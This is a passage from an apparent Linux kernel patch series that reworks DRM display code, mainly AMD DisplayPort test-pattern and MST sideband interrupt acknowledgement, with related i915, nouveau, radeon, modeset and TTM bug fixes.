++		requestPixelEncoding = PIXEL_ENCODING_RGB;
++		break;
++	}
++
++	if ((requestColorDepth != COLOR_DEPTH_UNDEFINED
++		&& pipe_ctx->stream->timing.display_color_depth != requestColorDepth)
++		|| (requestPixelEncoding != PIXEL_ENCODING_UNDEFINED
++		&& pipe_ctx->stream->timing.pixel_encoding != requestPixelEncoding)) {
++		DC_LOG_DEBUG("%s: original bpc %d pix encoding %d, changing to %d  %d\n",
++				__func__,
++				pipe_ctx->stream->timing.display_color_depth,
++				pipe_ctx->stream->timing.pixel_encoding,
++				requestColorDepth,
++				requestPixelEncoding);
++		pipe_ctx->stream->timing.display_color_depth = requestColorDepth;
++		pipe_ctx->stream->timing.pixel_encoding = requestPixelEncoding;
++
++		dp_update_dsc_config(pipe_ctx);
++
++		aconnector->timing_changed = true;
++		/* store current timing */
++		if (aconnector->timing_requested)
++			*aconnector->timing_requested = pipe_ctx->stream->timing;
++		else
++			DC_LOG_ERROR("%s: timing storage failed\n", __func__);
++
++	}
++
++	dc_link_dp_set_test_pattern(
++		(struct dc_link *) link,
++		test_pattern,
++		test_pattern_color_space,
++		NULL,
++		NULL,
++		0);
++
++	return false;
++}
++
+ void dm_set_phyd32clk(struct dc_context *ctx, int freq_khz)
+ {
+        // TODO
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index e2f9141d6d938..05708684c9f58 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -590,8 +590,118 @@ dm_dp_add_mst_connector(struct drm_dp_mst_topology_mgr *mgr,
+ 	return connector;
+ }
+ 
++void dm_handle_mst_sideband_msg_ready_event(
++	struct drm_dp_mst_topology_mgr *mgr,
++	enum mst_msg_ready_type msg_rdy_type)
++{
++	uint8_t esi[DP_PSR_ERROR_STATUS - DP_SINK_COUNT_ESI] = { 0 };
++	uint8_t dret;
++	bool new_irq_handled = false;
++	int dpcd_addr;
++	uint8_t dpcd_bytes_to_read;
++	const uint8_t max_process_count = 30;
++	uint8_t process_count = 0;
++	u8 retry;
++	struct amdgpu_dm_connector *aconnector =
++			container_of(mgr, struct amdgpu_dm_connector, mst_mgr);
++
++
++	const struct dc_link_status *link_status = dc_link_get_status(aconnector->dc_link);
++
++	if (link_status->dpcd_caps->dpcd_rev.raw < 0x12) {
++		dpcd_bytes_to_read = DP_LANE0_1_STATUS - DP_SINK_COUNT;
++		/* DPCD 0x200 - 0x201 for downstream IRQ */
++		dpcd_addr = DP_SINK_COUNT;
++	} else {
++		dpcd_bytes_to_read = DP_PSR_ERROR_STATUS - DP_SINK_COUNT_ESI;
++		/* DPCD 0x2002 - 0x2005 for downstream IRQ */
++		dpcd_addr = DP_SINK_COUNT_ESI;
++	}
++
++	mutex_lock(&aconnector->handle_mst_msg_ready);
++
++	while (process_count < max_process_count) {
++		u8 ack[DP_PSR_ERROR_STATUS - DP_SINK_COUNT_ESI] = {};
++
++		process_count++;
++
++		dret = drm_dp_dpcd_read(
++			&aconnector->dm_dp_aux.aux,
++			dpcd_addr,
++			esi,
++			dpcd_bytes_to_read);
++
++		if (dret != dpcd_bytes_to_read) {
++			DRM_DEBUG_KMS("DPCD read and acked number is not as expected!");
++			break;
++		}
++
++		DRM_DEBUG_DRIVER("ESI %02x %02x %02x\n", esi[0], esi[1], esi[2]);
++
++		switch (msg_rdy_type) {
++		case DOWN_REP_MSG_RDY_EVENT:
++			/* Only handle DOWN_REP_MSG_RDY case*/
++			esi[1] &= DP_DOWN_REP_MSG_RDY;
++			break;
++		case UP_REQ_MSG_RDY_EVENT:
++			/* Only handle UP_REQ_MSG_RDY case*/
++			esi[1] &= DP_UP_REQ_MSG_RDY;
++			break;
++		default:
++			/* Handle both cases*/
++			esi[1] &= (DP_DOWN_REP_MSG_RDY | DP_UP_REQ_MSG_RDY);
++			break;
++		}
++
++		if (!esi[1])
++			break;
++
++		/* handle MST irq */
++		if (aconnector->mst_mgr.mst_state)
++			drm_dp_mst_hpd_irq_handle_event(&aconnector->mst_mgr,
++						 esi,
++						 ack,
++						 &new_irq_handled);
++
++		if (new_irq_handled) {
++			/* ACK at DPCD to notify down stream */
++			for (retry = 0; retry < 3; retry++) {
++				ssize_t wret;
++
++				wret = drm_dp_dpcd_writeb(&aconnector->dm_dp_aux.aux,
++							  dpcd_addr + 1,
++							  ack[1]);
++				if (wret == 1)
++					break;
++			}
++
++			if (retry == 3) {
++				DRM_ERROR("Failed to ack MST event.\n");
++				return;
++			}
++
++			drm_dp_mst_hpd_irq_send_new_request(&aconnector->mst_mgr);
++
++			new_irq_handled = false;
++		} else {
++			break;
++		}
++	}
++
++	mutex_unlock(&aconnector->handle_mst_msg_ready);
++
++	if (process_count == max_process_count)
++		DRM_DEBUG_DRIVER("Loop exceeded max iterations\n");
++}
++
++static void dm_handle_mst_down_rep_msg_ready(struct drm_dp_mst_topology_mgr *mgr)
++{
++	dm_handle_mst_sideband_msg_ready_event(mgr, DOWN_REP_MSG_RDY_EVENT);
++}
++
+ static const struct drm_dp_mst_topology_cbs dm_mst_cbs = {
+ 	.add_connector = dm_dp_add_mst_connector,
++	.poll_hpd_irq = dm_handle_mst_down_rep_msg_ready,
+ };
+ 
+ void amdgpu_dm_initialize_dp_connector(struct amdgpu_display_manager *dm,
+@@ -673,15 +783,18 @@ static void set_dsc_configs_from_fairness_vars(struct dsc_mst_fairness_params *p
+ 		int count,
+ 		int k)
+ {
++	struct drm_connector *drm_connector;
+ 	int i;
+ 
+ 	for (i = 0; i < count; i++) {
++		drm_connector = &params[i].aconnector->base;
++
+ 		memset(&params[i].timing->dsc_cfg, 0, sizeof(params[i].timing->dsc_cfg));
+ 		if (vars[i + k].dsc_enabled && dc_dsc_compute_config(
+ 					params[i].sink->ctx->dc->res_pool->dscs[0],
+ 					&params[i].sink->dsc_caps.dsc_dec_caps,
+ 					params[i].sink->ctx->dc->debug.dsc_min_slice_height_override,
+-					params[i].sink->edid_caps.panel_patch.max_dsc_target_bpp_limit,
++					drm_connector->display_info.max_dsc_bpp,
+ 					0,
+ 					params[i].timing,
+ 					&params[i].timing->dsc_cfg)) {
+@@ -723,12 +836,16 @@ static int bpp_x16_from_pbn(struct dsc_mst_fairness_params param, int pbn)
+ 	struct dc_dsc_config dsc_config;
+ 	u64 kbps;
+ 
++	struct drm_connector *drm_connector = &param.aconnector->base;
++	uint32_t max_dsc_target_bpp_limit_override =
++		drm_connector->display_info.max_dsc_bpp;
++
+ 	kbps = div_u64((u64)pbn * 994 * 8 * 54, 64);
+ 	dc_dsc_compute_config(
+ 			param.sink->ctx->dc->res_pool->dscs[0],
+ 			&param.sink->dsc_caps.dsc_dec_caps,
+ 			param.sink->ctx->dc->debug.dsc_min_slice_height_override,
+-			param.sink->edid_caps.panel_patch.max_dsc_target_bpp_limit,
++			max_dsc_target_bpp_limit_override,
+ 			(int) kbps, param.timing, &dsc_config);
+ 
+ 	return dsc_config.bits_per_pixel;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
+index 1e4ede1e57abd..37c820ab0fdbc 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
+@@ -49,6 +49,13 @@
+ #define PBN_FEC_OVERHEAD_MULTIPLIER_8B_10B	1031
+ #define PBN_FEC_OVERHEAD_MULTIPLIER_128B_132B	1000
+ 
++enum mst_msg_ready_type {
++	NONE_MSG_RDY_EVENT = 0,
++	DOWN_REP_MSG_RDY_EVENT = 1,
++	UP_REQ_MSG_RDY_EVENT = 2,
++	DOWN_OR_UP_MSG_RDY_EVENT = 3
++};
++
+ struct amdgpu_display_manager;
+ struct amdgpu_dm_connector;
+ 
+@@ -61,6 +68,10 @@ void amdgpu_dm_initialize_dp_connector(struct amdgpu_display_manager *dm,
+ void
+ dm_dp_create_fake_mst_encoders(struct amdgpu_device *adev);
+ 
++void dm_handle_mst_sideband_msg_ready_event(
++	struct drm_dp_mst_topology_mgr *mgr,
++	enum mst_msg_ready_type msg_rdy_type);
++
+ struct dsc_mst_fairness_vars {
+ 	int pbn;
+ 	bool dsc_enabled;
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_clk_mgr.c
+index c1eaf571407a3..9f593eddb6b71 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_clk_mgr.c
+@@ -86,6 +86,11 @@ static int dcn31_get_active_display_cnt_wa(
+ 				stream->signal == SIGNAL_TYPE_DVI_SINGLE_LINK ||
+ 				stream->signal == SIGNAL_TYPE_DVI_DUAL_LINK)
+ 			tmds_present = true;
++
++		/* Checking stream / link detection ensuring that PHY is active*/
++		if (dc_is_dp_signal(stream->signal) && !stream->dpms_off)
++			display_count++;
++
+ 	}
+ 
+ 	for (i = 0; i < dc->link_count; i++) {
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c b/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
+index 24f1aba4ae133..82b747c0ed693 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
+@@ -3115,7 +3115,7 @@ struct dc_link_settings dp_get_max_link_cap(struct dc_link *link)
+ 	return max_link_cap;
+ }
+ 
+-static enum dc_status read_hpd_rx_irq_data(
++enum dc_status read_hpd_rx_irq_data(
+ 	struct dc_link *link,
+ 	union hpd_irq_data *irq_data)
+ {
+@@ -4264,124 +4264,6 @@ static void dp_test_send_phy_test_pattern(struct dc_link *link)
+ 		test_pattern_size);
+ }
+ 
+-static void dp_test_send_link_test_pattern(struct dc_link *link)
+-{
+-	union link_test_pattern dpcd_test_pattern;
+-	union test_misc dpcd_test_params;
+-	enum dp_test_pattern test_pattern;
+-	enum dp_test_pattern_color_space test_pattern_color_space =
+-			DP_TEST_PATTERN_COLOR_SPACE_UNDEFINED;
+-	enum dc_color_depth requestColorDepth = COLOR_DEPTH_UNDEFINED;
+-	struct pipe_ctx *pipes = link->dc->current_state->res_ctx.pipe_ctx;
+-	struct pipe_ctx *pipe_ctx = NULL;
+-	int i;
+-
+-	memset(&dpcd_test_pattern, 0, sizeof(dpcd_test_pattern));
+-	memset(&dpcd_test_params, 0, sizeof(dpcd_test_params));
+-
+-	for (i = 0; i < MAX_PIPES; i++) {
+-		if (pipes[i].stream == NULL)
+-			continue;
+-
+-		if (pipes[i].stream->link == link && !pipes[i].top_pipe && !pipes[i].prev_odm_pipe) {
+-			pipe_ctx = &pipes[i];
+-			break;
+-		}
+-	}
+-
+-	if (pipe_ctx == NULL)
+-		return;
+-
+-	/* get link test pattern and pattern parameters */
+-	core_link_read_dpcd(
+-			link,
+-			DP_TEST_PATTERN,
+-			&dpcd_test_pattern.raw,
+-			sizeof(dpcd_test_pattern));
+-	core_link_read_dpcd(
+-			link,
+-			DP_TEST_MISC0,
+-			&dpcd_test_params.raw,
+-			sizeof(dpcd_test_params));
+-
+-	switch (dpcd_test_pattern.bits.PATTERN) {
+-	case LINK_TEST_PATTERN_COLOR_RAMP:
+-		test_pattern = DP_TEST_PATTERN_COLOR_RAMP;
+-	break;
+-	case LINK_TEST_PATTERN_VERTICAL_BARS:
+-		test_pattern = DP_TEST_PATTERN_VERTICAL_BARS;
+-	break; /* black and white */
+-	case LINK_TEST_PATTERN_COLOR_SQUARES:
+-		test_pattern = (dpcd_test_params.bits.DYN_RANGE ==
+-				TEST_DYN_RANGE_VESA ?
+-				DP_TEST_PATTERN_COLOR_SQUARES :
+-				DP_TEST_PATTERN_COLOR_SQUARES_CEA);
+-	break;
+-	default:
+-		test_pattern = DP_TEST_PATTERN_VIDEO_MODE;
+-	break;
+-	}
+-
+-	if (dpcd_test_params.bits.CLR_FORMAT == 0)
+-		test_pattern_color_space = DP_TEST_PATTERN_COLOR_SPACE_RGB;
+-	else
+-		test_pattern_color_space = dpcd_test_params.bits.YCBCR_COEFS ?
+-				DP_TEST_PATTERN_COLOR_SPACE_YCBCR709 :
+-				DP_TEST_PATTERN_COLOR_SPACE_YCBCR601;
+-
+-	switch (dpcd_test_params.bits.BPC) {
+-	case 0: // 6 bits
+-		requestColorDepth = COLOR_DEPTH_666;
+-		break;
+-	case 1: // 8 bits
+-		requestColorDepth = COLOR_DEPTH_888;
+-		break;
+-	case 2: // 10 bits
+-		requestColorDepth = COLOR_DEPTH_101010;
+-		break;
+-	case 3: // 12 bits
+-		requestColorDepth = COLOR_DEPTH_121212;
+-		break;
+-	default:
+-		break;
+-	}
+-
+-	switch (dpcd_test_params.bits.CLR_FORMAT) {
+-	case 0:
+-		pipe_ctx->stream->timing.pixel_encoding = PIXEL_ENCODING_RGB;
+-		break;
+-	case 1:
+-		pipe_ctx->stream->timing.pixel_encoding = PIXEL_ENCODING_YCBCR422;
+-		break;
+-	case 2:
+-		pipe_ctx->stream->timing.pixel_encoding = PIXEL_ENCODING_YCBCR444;
+-		break;
+-	default:
+-		pipe_ctx->stream->timing.pixel_encoding = PIXEL_ENCODING_RGB;
+-		break;
+-	}
+-
+-
+-	if (requestColorDepth != COLOR_DEPTH_UNDEFINED
+-			&& pipe_ctx->stream->timing.display_color_depth != requestColorDepth) {
+-		DC_LOG_DEBUG("%s: original bpc %d, changing to %d\n",
+-				__func__,
+-				pipe_ctx->stream->timing.display_color_depth,
+-				requestColorDepth);
+-		pipe_ctx->stream->timing.display_color_depth = requestColorDepth;
+-	}
+-
+-	dp_update_dsc_config(pipe_ctx);
+-
+-	dc_link_dp_set_test_pattern(
+-			link,
+-			test_pattern,
+-			test_pattern_color_space,
+-			NULL,
+-			NULL,
+-			0);
+-}
+-
+ static void dp_test_get_audio_test_data(struct dc_link *link, bool disable_video)
+ {
+ 	union audio_test_mode            dpcd_test_mode = {0};
+@@ -4494,8 +4376,25 @@ void dc_link_dp_handle_automated_test(struct dc_link *link)
+ 		test_response.bits.ACK = 0;
+ 	}
+ 	if (test_request.bits.LINK_TEST_PATTRN) {
+-		dp_test_send_link_test_pattern(link);
+-		test_response.bits.ACK = 1;
++		union test_misc dpcd_test_params;
++		union link_test_pattern dpcd_test_pattern;
++
++		memset(&dpcd_test_pattern, 0, sizeof(dpcd_test_pattern));
++		memset(&dpcd_test_params, 0, sizeof(dpcd_test_params));
++
++		/* get link test pattern and pattern parameters */
++		core_link_read_dpcd(
++				link,
++				DP_TEST_PATTERN,
++				&dpcd_test_pattern.raw,
++				sizeof(dpcd_test_pattern));
++		core_link_read_dpcd(
++				link,
++				DP_TEST_MISC0,
++				&dpcd_test_params.raw,
++				sizeof(dpcd_test_params));
++		test_response.bits.ACK = dm_helpers_dp_handle_test_pattern_request(link->ctx, link,
++				dpcd_test_pattern, dpcd_test_params) ? 1 : 0;
+ 	}
+ 
+ 	if (test_request.bits.AUDIO_TEST_PATTERN) {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index 0dcd9fea122d0..a6fde27d13479 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -3293,7 +3293,8 @@ void dcn10_wait_for_mpcc_disconnect(
+ 		if (pipe_ctx->stream_res.opp->mpcc_disconnect_pending[mpcc_inst]) {
+ 			struct hubp *hubp = get_hubp_by_inst(res_pool, mpcc_inst);
+ 
+-			if (pipe_ctx->stream_res.tg->funcs->is_tg_enabled(pipe_ctx->stream_res.tg))
++			if (pipe_ctx->stream_res.tg &&
++				pipe_ctx->stream_res.tg->funcs->is_tg_enabled(pipe_ctx->stream_res.tg))
+ 				res_pool->mpc->funcs->wait_for_idle(res_pool->mpc, mpcc_inst);
+ 			pipe_ctx->stream_res.opp->mpcc_disconnect_pending[mpcc_inst] = false;
+ 			hubp->funcs->set_blank(hubp, true);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c b/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c
+index 7e7f18bef0986..1f263326cdf9e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c
+@@ -65,7 +65,7 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 		.timing_trace = false,
+ 		.clock_trace = true,
+ 		.disable_pplib_clock_request = true,
+-		.pipe_split_policy = MPC_SPLIT_DYNAMIC,
++		.pipe_split_policy = MPC_SPLIT_AVOID,
+ 		.force_single_disp_pipe_split = false,
+ 		.disable_dcc = DCC_ENABLE,
+ 		.vsr_support = true,
+diff --git a/drivers/gpu/drm/amd/display/dc/dm_helpers.h b/drivers/gpu/drm/amd/display/dc/dm_helpers.h
+index e3e5c39895a3a..d0ad682fdde8f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dm_helpers.h
++++ b/drivers/gpu/drm/amd/display/dc/dm_helpers.h
+@@ -156,6 +156,12 @@ enum dc_edid_status dm_helpers_read_local_edid(
+ 		struct dc_link *link,
+ 		struct dc_sink *sink);
+ 
++bool dm_helpers_dp_handle_test_pattern_request(
++		struct dc_context *ctx,
++		const struct dc_link *link,
++		union link_test_pattern dpcd_test_pattern,
++		union test_misc dpcd_test_params);
++
+ void dm_set_dcn_clocks(
+ 		struct dc_context *ctx,
+ 		struct dc_clocks *clks);
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/dc_link_dp.h b/drivers/gpu/drm/amd/display/dc/inc/dc_link_dp.h
+index b304d450b038a..d60d93ed7df0c 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/dc_link_dp.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/dc_link_dp.h
+@@ -82,6 +82,10 @@ bool perform_link_training_with_retries(
+ 	enum signal_type signal,
+ 	bool do_fallback);
+ 
++enum dc_status read_hpd_rx_irq_data(
++	struct dc_link *link,
++	union hpd_irq_data *irq_data);
++
+ bool hpd_rx_irq_check_link_loss_status(
+ 	struct dc_link *link,
+ 	union hpd_irq_data *hpd_irq_dpcd_data);
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index f7ed3e655e397..1b7d93709a352 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -1927,12 +1927,16 @@ static int sienna_cichlid_read_sensor(struct smu_context *smu,
+ 		*size = 4;
+ 		break;
+ 	case AMDGPU_PP_SENSOR_GFX_MCLK:
+-		ret = sienna_cichlid_get_current_clk_freq_by_table(smu, SMU_UCLK, (uint32_t *)data);
++		ret = sienna_cichlid_get_smu_metrics_data(smu,
++							  METRICS_CURR_UCLK,
++							  (uint32_t *)data);
+ 		*(uint32_t *)data *= 100;
+ 		*size = 4;
+ 		break;
+ 	case AMDGPU_PP_SENSOR_GFX_SCLK:
+-		ret = sienna_cichlid_get_current_clk_freq_by_table(smu, SMU_GFXCLK, (uint32_t *)data);
++		ret = sienna_cichlid_get_smu_metrics_data(smu,
++							  METRICS_AVERAGE_GFXCLK,
++							  (uint32_t *)data);
+ 		*(uint32_t *)data *= 100;
+ 		*size = 4;
+ 		break;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index d980eff2b6166..bf24850027dab 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -940,7 +940,7 @@ static int smu_v13_0_7_read_sensor(struct smu_context *smu,
+ 		break;
+ 	case AMDGPU_PP_SENSOR_GFX_MCLK:
+ 		ret = smu_v13_0_7_get_smu_metrics_data(smu,
+-						       METRICS_AVERAGE_UCLK,
++						       METRICS_CURR_UCLK,
+ 						       (uint32_t *)data);
+ 		*(uint32_t *)data *= 100;
+ 		*size = 4;
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index e2e21ce79510e..f854cb5eafbe7 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -4053,17 +4053,28 @@ out:
+ }
+ 
+ /**
+- * drm_dp_mst_hpd_irq() - MST hotplug IRQ notify
++ * drm_dp_mst_hpd_irq_handle_event() - MST hotplug IRQ handle MST event
+  * @mgr: manager to notify irq for.
+  * @esi: 4 bytes from SINK_COUNT_ESI
++ * @ack: 4 bytes used to ack events starting from SINK_COUNT_ESI
+  * @handled: whether the hpd interrupt was consumed or not
+  *
+- * This should be called from the driver when it detects a short IRQ,
++ * This should be called from the driver when it detects a HPD IRQ,
+  * along with the value of the DEVICE_SERVICE_IRQ_VECTOR_ESI0. The
+- * topology manager will process the sideband messages received as a result
+- * of this.
++ * topology manager will process the sideband messages received
++ * as indicated in the DEVICE_SERVICE_IRQ_VECTOR_ESI0 and set the
++ * corresponding flags that Driver has to ack the DP receiver later.
++ *
++ * Note that driver shall also call
++ * drm_dp_mst_hpd_irq_send_new_request() if the 'handled' is set
++ * after calling this function, to try to kick off a new request in
++ * the queue if the previous message transaction is completed.
++ *
++ * See also:
++ * drm_dp_mst_hpd_irq_send_new_request()
+  */
+-int drm_dp_mst_hpd_irq(struct drm_dp_mst_topology_mgr *mgr, u8 *esi, bool *handled)
++int drm_dp_mst_hpd_irq_handle_event(struct drm_dp_mst_topology_mgr *mgr, const u8 *esi,
++				    u8 *ack, bool *handled)
+ {
+ 	int ret = 0;
+ 	int sc;
+@@ -4078,18 +4089,47 @@ int drm_dp_mst_hpd_irq(struct drm_dp_mst_topology_mgr *mgr, u8 *esi, bool *handl
+ 	if (esi[1] & DP_DOWN_REP_MSG_RDY) {
+ 		ret = drm_dp_mst_handle_down_rep(mgr);
+ 		*handled = true;
++		ack[1] |= DP_DOWN_REP_MSG_RDY;
+ 	}
+ 
+ 	if (esi[1] & DP_UP_REQ_MSG_RDY) {
+ 		ret |= drm_dp_mst_handle_up_req(mgr);
+ 		*handled = true;
++		ack[1] |= DP_UP_REQ_MSG_RDY;
+ 	}
+ 
+-	drm_dp_mst_kick_tx(mgr);
+ 	return ret;
+ }
+-EXPORT_SYMBOL(drm_dp_mst_hpd_irq);
++EXPORT_SYMBOL(drm_dp_mst_hpd_irq_handle_event);
+ 
++/**
++ * drm_dp_mst_hpd_irq_send_new_request() - MST hotplug IRQ kick off new request
++ * @mgr: manager to notify irq for.
++ *
++ * This should be called from the driver when mst irq event is handled
++ * and acked. Note that new down request should only be sent when
++ * previous message transaction is completed. Source is not supposed to generate
++ * interleaved message transactions.
++ */
++void drm_dp_mst_hpd_irq_send_new_request(struct drm_dp_mst_topology_mgr *mgr)
++{
++	struct drm_dp_sideband_msg_tx *txmsg;
++	bool kick = true;
++
++	mutex_lock(&mgr->qlock);
++	txmsg = list_first_entry_or_null(&mgr->tx_msg_downq,
++					 struct drm_dp_sideband_msg_tx, next);
++	/* If last transaction is not completed yet*/
++	if (!txmsg ||
++	    txmsg->state == DRM_DP_SIDEBAND_TX_START_SEND ||
++	    txmsg->state == DRM_DP_SIDEBAND_TX_SENT)
++		kick = false;
++	mutex_unlock(&mgr->qlock);
++
++	if (kick)
++		drm_dp_mst_kick_tx(mgr);
++}
++EXPORT_SYMBOL(drm_dp_mst_hpd_irq_send_new_request);
+ /**
+  * drm_dp_mst_detect_port() - get connection status for an MST port
+  * @connector: DRM connector for this port
+diff --git a/drivers/gpu/drm/drm_client_modeset.c b/drivers/gpu/drm/drm_client_modeset.c
+index bbc535cc50dd1..7847020de0a49 100644
+--- a/drivers/gpu/drm/drm_client_modeset.c
++++ b/drivers/gpu/drm/drm_client_modeset.c
+@@ -315,6 +315,9 @@ static bool drm_client_target_cloned(struct drm_device *dev,
+ 	can_clone = true;
+ 	dmt_mode = drm_mode_find_dmt(dev, 1024, 768, 60, false);
+ 
++	if (!dmt_mode)
++		goto fail;
++
+ 	for (i = 0; i < connector_count; i++) {
+ 		if (!enabled[i])
+ 			continue;
+@@ -330,11 +333,13 @@ static bool drm_client_target_cloned(struct drm_device *dev,
+ 		if (!modes[i])
+ 			can_clone = false;
+ 	}
++	kfree(dmt_mode);
+ 
+ 	if (can_clone) {
+ 		DRM_DEBUG_KMS("can clone using 1024x768\n");
+ 		return true;
+ 	}
++fail:
+ 	DRM_INFO("kms: can't enable cloning when we probably wanted to.\n");
+ 	return false;
+ }
+@@ -866,6 +871,7 @@ int drm_client_modeset_probe(struct drm_client_dev *client, unsigned int width,
+ 				break;
+ 			}
+ 
++			kfree(modeset->mode);
+ 			modeset->mode = drm_mode_duplicate(dev, mode);
+ 			drm_connector_get(connector);
+ 			modeset->connectors[modeset->num_connectors++] = connector;
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index b1653308f1450..594ea037050a9 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -3804,9 +3804,7 @@ intel_dp_mst_hpd_irq(struct intel_dp *intel_dp, u8 *esi, u8 *ack)
+ {
+ 	bool handled = false;
+ 
+-	drm_dp_mst_hpd_irq(&intel_dp->mst_mgr, esi, &handled);
+-	if (handled)
+-		ack[1] |= esi[1] & (DP_DOWN_REP_MSG_RDY | DP_UP_REQ_MSG_RDY);
++	drm_dp_mst_hpd_irq_handle_event(&intel_dp->mst_mgr, esi, ack, &handled);
+ 
+ 	if (esi[1] & DP_CP_IRQ) {
+ 		intel_hdcp_handle_cp_irq(intel_dp->attached_connector);
+@@ -3881,6 +3879,9 @@ intel_dp_check_mst_status(struct intel_dp *intel_dp)
+ 
+ 		if (!intel_dp_ack_sink_irq_esi(intel_dp, ack))
+ 			drm_dbg_kms(&i915->drm, "Failed to ack ESI\n");
++
++		if (ack[1] & (DP_DOWN_REP_MSG_RDY | DP_UP_REQ_MSG_RDY))
++			drm_dp_mst_hpd_irq_send_new_request(&intel_dp->mst_mgr);
+ 	}
+ 
+ 	return link_ok;
+diff --git a/drivers/gpu/drm/nouveau/dispnv50/disp.c b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+index 006cb76adaa93..a851354c0c5f8 100644
+--- a/drivers/gpu/drm/nouveau/dispnv50/disp.c
++++ b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+@@ -1473,22 +1473,26 @@ nv50_mstm_service(struct nouveau_drm *drm,
+ 	u8 esi[8] = {};
+ 
+ 	while (handled) {
++		u8 ack[8] = {};
++
+ 		rc = drm_dp_dpcd_read(aux, DP_SINK_COUNT_ESI, esi, 8);
+ 		if (rc != 8) {
+ 			ret = false;
+ 			break;
+ 		}
+ 
+-		drm_dp_mst_hpd_irq(&mstm->mgr, esi, &handled);
++		drm_dp_mst_hpd_irq_handle_event(&mstm->mgr, esi, ack, &handled);
+ 		if (!handled)
+ 			break;
+ 
+-		rc = drm_dp_dpcd_write(aux, DP_SINK_COUNT_ESI + 1, &esi[1],
+-				       3);
+-		if (rc != 3) {
++		rc = drm_dp_dpcd_writeb(aux, DP_SINK_COUNT_ESI + 1, ack[1]);
++
++		if (rc != 1) {
+ 			ret = false;
+ 			break;
+ 		}
++
++		drm_dp_mst_hpd_irq_send_new_request(&mstm->mgr);
+ 	}
+ 
+ 	if (!ret)
+diff --git a/drivers/gpu/drm/radeon/radeon_cs.c b/drivers/gpu/drm/radeon/radeon_cs.c
+index 446f7bae54c4e..e3664f65d1a9c 100644
+--- a/drivers/gpu/drm/radeon/radeon_cs.c
++++ b/drivers/gpu/drm/radeon/radeon_cs.c
+@@ -270,7 +270,8 @@ int radeon_cs_parser_init(struct radeon_cs_parser *p, void *data)
+ {
+ 	struct drm_radeon_cs *cs = data;
+ 	uint64_t *chunk_array_ptr;
+-	unsigned size, i;
++	u64 size;
++	unsigned i;
+ 	u32 ring = RADEON_CS_RING_GFX;
+ 	s32 priority = 0;
+ 
+diff --git a/drivers/gpu/drm/ttm/ttm_resource.c b/drivers/gpu/drm/ttm/ttm_resource.c
+index a729c32a1e48a..3287032a2f8e8 100644
+--- a/drivers/gpu/drm/ttm/ttm_resource.c
++++ b/drivers/gpu/drm/ttm/ttm_resource.c
+@@ -85,6 +85,8 @@ static void ttm_lru_bulk_move_pos_tail(struct ttm_lru_bulk_move_pos *pos,
+ 				       struct ttm_resource *res)
+ {
+ 	if (pos->last != res) {
++		if (pos->first == res)
++			pos->first = list_next_entry(res, lru);
+ 		list_move(&res->lru, &pos->last->lru);
+ 		pos->last = res;
+ 	}
+@@ -110,7 +112,8 @@ static void ttm_lru_bulk_move_del(struct ttm_lru_bulk_move *bulk,
+ {
+ 	struct ttm_lru_bulk_move_pos *pos = ttm_lru_bulk_move_pos(bulk, res);
+ 
